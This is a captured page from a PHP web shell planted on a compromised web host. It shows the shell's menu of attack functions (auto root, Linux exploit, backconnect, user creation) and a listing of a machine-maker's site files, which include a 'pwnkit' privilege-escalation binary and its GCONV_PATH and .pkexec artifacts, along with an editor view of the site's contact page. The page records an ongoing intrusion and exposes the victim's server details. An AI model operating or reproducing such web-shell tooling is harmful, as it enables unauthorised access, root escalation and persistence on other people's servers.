Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
assets
[ DIR ]
drwxr-xr-x
?;
authentic_siddhapura_machine
[ DIR ]
drwxr-xr-x
?;
database_19_11_2020
[ DIR ]
drwxr-xr-x
?;
einvite
[ DIR ]
drwxr-xr-x
.htaccess
1.88
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
583
B
-rw-r--r--
400.shtml
16.38
KB
-rw-r--r--
403.shtml
16.38
KB
-rw-r--r--
404.php
1.48
KB
-rw-r--r--
404.shtml
16.39
KB
-rw-r--r--
503.shtml
15.33
KB
-rw-r--r--
about.php
5.51
KB
-rw-r--r--
certification.php
987
B
-rw-r--r--
config.php
197
B
-rw-r--r--
contact.php
3.84
KB
-rw-r--r--
eventsandexhibition.php
1.14
KB
-rw-r--r--
exhibition.php
1.36
KB
-rw-r--r--
exhibition_category.php
1.19
KB
-rw-r--r--
footer.php
7.35
KB
-rw-r--r--
header.php
10.34
KB
-rw-r--r--
index.php
4.03
KB
-r--r--r--
mailcheck.php
0
B
-rw-r--r--
php.ini
577
B
-rw-r--r--
product.php
2.79
KB
-rw-r--r--
product_category.php
2.21
KB
-rw-r--r--
product_details.php
3.46
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slider.php
1.23
KB
-rw-r--r--
ss.php
15.03
KB
-rw-r--r--
working_site_backup_19_11_2020...
89.41
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?php include("header.php"); ?> <!-- slider Area Start--> <style> .button { display: inline-block; padding: 10px 20px; font-size: 20px; font-weight: bold; color: #fff; background-color: #007bff; text-decoration: none; border-radius: 5px; transition: background-color 0.3s ease, transform 0.2s ease; } .button:hover { background-color: #0056b3; transform: scale(1.05); } .button:active { transform: scale(0.95); } </style> <!-- slider Area End--> <!-- ================ contact section start ================= --> <section class="contact"> <div class="container"> <iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d1846.0019249967022!2d70.82317!3d22.277844!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x704b887bcf24f90f!2sSiddhapura%20Machines!5e0!3m2!1sen!2sin!4v1591766043827!5m2!1sen!2sin" width="100%" height="300px" frameborder="0"style="border:10;border-style: solid ;border-radius: 20px;border-color: #eeeeee; margin-top:20px" allowfullscreen="" aria-hidden="false" tabindex="0"></iframe> <div class="row"> <div class="col-12"> <h2 class="contact-title">Get in Touch</h2> </div> <div class="col-lg-3 offset-lg-1"> <div class="media contact-info"> <span class="contact-info__icon"><i class="ti-home"></i></span> <div class="media-body"> <?php $fb="SELECT * FROM `sm_details` where id=10"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <h3>Siddhapura Machines</h3> <p><?php echo $fbar['sm_detail'];?></p> </div> </div> </div> <div class="col-lg-3 offset-lg-1"> <div class="media contact-info"> <span class="contact-info__icon"><i class="ti-tablet"></i></span> <div class="media-body"> <?php $fb="SELECT * FROM `sm_details` where id=2"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <h3><?php echo $fbar['sm_detail'];?></h3> <?php $fb="SELECT * FROM `sm_details` where id=3"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <h3><?php echo $fbar['sm_detail'];?></h3> <?php $fb="SELECT * FROM `sm_details` where id=1"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <h3><?php echo $fbar['sm_detail'];?></h3> </div> </div> </div> <div class="col-lg-3 offset-lg-1"> <div class="media contact-info"> <span class="contact-info__icon"><i class="ti-email"></i></span> <div class="media-body"> <?php $fb="SELECT * FROM `sm_details` where id=4"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <h3><?php echo $fbar['sm_detail'];?></h3> <p>Send us your query anytime!</p> <?php $fb="SELECT * FROM `sm_details` where id=21"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <a href="<?php echo $fbar['sm_detail'];?>" class="button" target="_blank">Inquire Now!</a> </div> </div> </div> </div> </div> </section> <!-- ================ contact section end ================= --> <?php include("footer.php"); ?> </body> </html>
Close